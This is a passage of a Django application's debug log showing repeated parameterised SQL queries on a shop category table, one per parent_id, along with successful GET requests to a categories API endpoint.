"shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 22:47:59,184 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 22:47:59,187 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 22:47:59,191 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 22:47:59,195 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 22:47:59,201 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 22:47:59,205 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 22:47:59,209 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 22:47:59,213 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 22:47:59,216 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 22:47:59,223 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 22:47:59,226 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 22:47:59,230 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 22:47:59,234 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 22:47:59,238 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 22:47:59,242 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 22:47:59,247 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 22:47:59,250 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 22:47:59,254 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 22:47:59,259 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 22:47:59,263 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 22:47:59] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 22:48:00,905 utils 2749 140297233225472 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 22:48:00,911 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 22:48:00,915 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 22:48:00,917 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 22:48:00,921 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 22:48:00,923 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 22:48:00,926 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 22:48:00,928 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 22:48:00,930 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 22:48:00,933 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 22:48:00,936 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 22:48:00,939 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 22:48:00,941 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 22:48:00,943 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 22:48:00,948 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 22:48:00,952 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 22:48:00,956 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 22:48:00,960 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 22:48:00,964 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 22:48:00,971 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 22:48:00,974 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 22:48:00,978 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 22:48:00,982 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 22:48:00,986 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 22:48:00,990 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 22:48:00,996 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 22:48:01,000 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 22:48:01,004 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 22:48:01,008 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 22:48:01,012 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 22:48:01,019 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 22:48:01,023 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 22:48:01,026 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 22:48:01,030 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 22:48:01,034 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 22:48:01,041 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 22:48:01,045 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 22:48:01,049 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 22:48:01,053 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 22:48:01,057 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 22:48:01,061 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 22:48:01,066 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 22:48:01,070 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 22:48:01,074 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 22:48:01,079 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 22:48:01,083 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 22:48:01] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 22:48:02,765 utils 2749 140297233225472 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 22:48:02,775 utils 